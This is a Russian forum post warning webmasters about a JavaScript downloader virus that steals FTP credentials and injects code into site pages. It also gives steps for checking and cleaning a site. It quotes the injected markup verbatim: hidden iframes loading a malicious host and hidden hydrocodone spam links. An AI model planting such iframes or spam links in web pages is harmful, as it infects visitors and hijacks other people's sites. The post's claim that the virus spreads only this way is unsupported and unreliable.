don Rumata
Не знаю, терли по этому поводу или нет, но обратите внимание, очень неприятная штука.
В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.
Схема заражения довольно проста: достаточно зайти на зараженный
сайт и при стандартных настройках безопасности браузера, вирус
автоматически установится на компьютере пользователя.
После этого он начинает отслеживать логины и пароли от FTP,
высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код, например, такой:
<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->
или
<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>
Проверьте свои сайты на предмет заражения. Для этого
достаточно проверить исходный код главной страницы на наличие постороннего текста.
В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:
1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователей FTP.
Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.
!!! Вирус распространяется только способом, описанным здесь, и его появление не связано с проблемами безопасности на сервере.
[i]Возможно, не туда запостил - перенесите плз если требуется.